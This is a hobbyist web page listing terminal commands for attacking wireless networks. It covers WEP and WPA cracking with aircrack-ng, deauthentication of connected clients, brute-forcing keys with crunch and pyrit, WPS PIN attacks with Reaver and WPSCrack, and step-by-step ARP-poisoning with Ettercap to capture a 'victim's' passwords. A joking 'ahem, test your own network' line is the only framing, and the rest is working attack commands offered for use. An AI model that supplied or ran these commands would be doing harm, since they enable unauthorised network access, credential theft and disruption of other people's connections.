Wifi Cracking Commands

Wireless Security Analyzing Commands -

these terminal commans are to 'ahem' test the security of your network

Homepage

............................

Kali Linux

KDE Edition

	Terminal Commands In SU Mode
	Cracking WEP

	**** SCANNING & COLLECTING ****
	airodump-ng -c 06 --ivs -w dump wlan0
	---------- { or to scan all channels
	airodump-ng --ivs -w dump wlan0

	**** FAKE AUTHERING *****
	aireplay-ng -1 0 -e NAME -a TT:AA:RR:GG:EE:TT -h FF:AA:KK:EE:MM:CC wlan0
	---------- { or for tricky routers
	aireplay-ng -1 600 -o 1 -q 10 -e NAME -a TT:AA:RR:GG:EE:TT -h FF:AA:KK:EE:MM:CC wlan0
	( 6000 = Reauth every 600 seconds, -o 1 = Send only 1 set of packets at a time, -q 1- = Send keep alive packets every 10 seconds )

	**** INJECTING *****
	aireplay-ng --arpreplay -b TT:AA:RR:GG:EE:TT -h UU:SS:EE:II:NN:GG wlan0

	**** SENDING RECIEVED PACKET INJECTING *****
	aireplay-ng -2 -p 0841 -c MM:YY:MM:AA:CC:AA -b TT:AA:RR:GG:EE:TT -h MM:YY:MM:AA:CC:AA wlan0

	**** DE - AUTHERING *****
	aireplay-ng -0 1 -a TT:AA:RR:GG:EE:TT -c UU:SS:EE:II:NN:GG wlan0

	**** CRACKING *****
	aircrack-ng -b TT:AA:RR:GG:EE:TT dump-01.ivs
	---------- { or choosing between 64bit & 128bit Wep
	aircrack-ng -n 64 dump-01.ivs

	Cracking WPA

	**** SCANNING & COLLECTING ****
	( -a = filter associated clients only, -c = channel, -w = write )
	airodump-ng -a -c 6 -w psk wlan0
	---------- { or to scan all channels
	airodump-ng -a -w psk wlan0
	---------- { or to scan only a specific client
	airodump-ng -a -c 6 --bssid TT:AA:RR:GG:EE:TT -w psk wlan0
	---------- { or to scan & collect only the .cap file
	airodump-ng -a --output-format pcap -w psk wlan0
	---------- { cmbined to scan a specific client on a specific channel collecting the cap file
	airodump-ng -a -c 9 --output-format pcap --bssid 00:18:39:A2:65:26 -w psk wlan0
	( --note-- pressing the TAB buttong puts it in select mode, scrolling down the list of AP's shows up the associated clients )
	( --note-- pressing the S button changes the list priority, e.g list by AP, Signal, SSID, Encryption etc.. )

	**** DE - AUTHERING *****
	aireplay-ng -0 1 -a TT:AA:RR:GG:EE:TT -c UU:SS:EE:II:NN:GG wlan0
	( 1 is the number of deauths to send, 0 means send them continuously.. )

	**** CRACKING *****
	aircrack-ng -w Passwords/passwords.lst psk*.cap
	---------- { or to crack using Kismet files
	aircrack-ng -w Passwords/passwords.lst Kismet*.dump

	Misc Commands

	**** CHANGING MAC ADDRESS OF CARD *****
	ifconfig wlan0 hw ether NN:EE:WW:MM:AA:CC
	**** STOPPING & STARTING THE WIFI CARD IN MONITOR MODE *****
	airmon-ng stop wlan0
	airmon-ng start wlan0
	**** INCREASING POWER ON WIFI CARD *****
	iw reg set BO
	**** CHECKING POWER ON WIFI CARD *****
	iw list
	**** EXTRACTING HANDSHAKES FROM LARGE CAP FILES *****
	tshark -r 'psk-01.cap' -R "eapol \|\| wlan.fc.type_subtype == 0x08" -w 'new.cap'
	( This extracts all handshakes and beacon packets from the cap file & creates a new file )
	tshark -r 'psk-01.cap' -R "eapol \|\| wlan_mgt == 00:14:6C:7E:40:80" -w 'new.cap'
	( This extracts the handshake and beacon packet of a specified client from the cap file & creates a new file )

	Other Cracking Commands
	♦ Using Aircrack

	aircrack-ng -w '/media/Data/Dictionaries/Ultimate.txt' psk*.cap
	aircrack-ng -w '/media/Data/Dictionaries/Ultimate.txt' Kismet*.dump
	aircrack-ng -w '/media/Data/Dictionaries/Numbers.txt' psk*.cap
	aircrack-ng -w '/media/Data/Dictionaries/Numbers.txt' Kismet*.dump

	♦ Using Pyrit

	pyrit -r "/home/macmon/psk*.cap" -i "/media/Data/Dictionaries/Ultimate.txt" attack_passthrough
	pyrit -r "/home/macmon/psk*.cap" -i "/media/Data/Dictionaries/Numbers.txt" attack_passthrough

	♦ Using Crunch To Generate Passwords

	crunch 10 10 0123456789ABCDEF \| pyrit -r "/home/macmon/psk-01.cap" -e "NAME" -i - attack_passthrough
	( This uses 10 digit hex on a given client taken from the cap file )
	crunch 8 8 0123456789 \| pyrit -r "/home/macmon/psk-01.cap" -e "NAME" -i - attack_passthrough
	( This uses 8 digit numbers on a given client taken from the cap file )
	crunch 10 10 1234567890ABCDEF \| aircrack-ng -b MM:AA:CC:MM:AA:CC -w - /home/macmon/psk-01.cap
	( This uses 10 digit hex on a given client taken from the cap file )
	crunch 8 8 1234567890 \| aircrack-ng -b MM:AA:CC:MM:AA:CC -w - /home/macmon/psk-01.cap
	( This uses 8 digit numbers on a given client taken from the cap file )

	♦ Using Cowpatty With Rainbow Tables

	cowpatty -s 2WIRE031 -d media/Extra/rainbow-tables/wpa_tables/xaa-0/2WIRE031 -r psk*cap
	( 2WIRE031 is an example, using a rainbow table file stored on the pc , change accordingly )

	♦ Other Pyrit Commands

	pyrit list_cores
	---------- { lists available cores for cracking
	pyrit benchmark
	---------- { tests pyrit for cracking speed
	pyrit -r "/home/macmon/psk-01.cap"
	---------- { examines the cap file for valid handshake

	Ettercap (middle man exploit)
	♦ Using Ettercap

	In Sniff menu select "unified sniffing" - select the network interface e.g wlan0
	In Host menu select "scan for hosts" - this finds anyone logged onto the network your targetting and on..
	if you dont want to arp poison attack and just do a descreet scan
	on the router and clients just click "start sniffing" in the start menu..
	In Host menu select "host list" - this shows the computers logged onto the target network..
	Click once on the gateway i.p e.g 192.168.1.1 so its highlighted, then click add to target 1
	Click once on the ip address of the victim (client) e.g 192.168.1.102 so it highlights then click add to target 2
	In View menu select "statistics",
	In Targets menu select "current targets"
	In Mitm nenu select "Arp Poisoning", in the box tick "sniff remote connections"
	In Start menu, select "stop sniffing" then select "start sniffing"
	watch the bottom window for passwords and web address from the client (victim)
	-you can also log the info easily by slecting logging - "log user messages"

	WPS Exploit (cracking wpa Using Reaver and WPSCrack - (Terminal)
	**** PUT THE WIFI ADAPTOR IN MONITOR MODE*****
	airmon-ng start wlan0

	Scanning for an access point to attack, and copy its 'mac' (TARGET) address for later ...

	♦ Wash (a terminal util part of the reaver installation)
	Wash is a utility for identifying WPS enabled access points. It can survey from a live interface:

	wash -i mon0
	By default, wash will perform a passive survey. However, wash can be instructed to send probe requests to each AP in order to obtain more information about the AP:
	wash -i mon0 --scan
	Too Fix a screen full of these - Found packet with bad FCS, skipping...
	wash -i mon0 -C -s
	Wash will only show access points that support WPS

	♦ Reaver - ( terminal version not gui )

	**** PUT THE WIFI ADAPTOR IN MONITOR MODE*****
	airmon-ng start wlan0
	This puts the card in monitor mode, take note of the mon number it allocates, i.e either mon0 or mon1 etc)
	**** ATTACK THE VICTIM *****
	reaver -i mon0 -b TT:AA:RR:GG:EE:TT -vv
	Wait -- could take some hours..

	The gui version does pretty much the same as terminal version ....

	♦ WPSCrack

	**** PUT THE WIFI ADAPTOR IN MONITOR MODE*****
	airmon-ng start wlan0
	This puts the card in monitor mode, take note of the mon number it allocates, i.e either mon0 or mon1 etc)

	**** ATTACK THE VICTIM *****
	cd to the directory where WPSCrack is located
	./wpscrack.py --iface mon0 --client MM:YY:MM:AA:CC:AA --bssid TT:AA:RR:GG:EE:TT --ssid testap -v
	if WPSCrack is in the usr/bin directory then there is no need to cd to the directory and then use the command below
	.wpscrack.py --iface mon0 --client MM:YY:MM:AA:CC:AA --bssid TT:AA:RR:GG:EE:TT --ssid testap -v
	Wait -- could take some hours..


	________________________________________________________

	Webpage designed by Bucky © M6VUK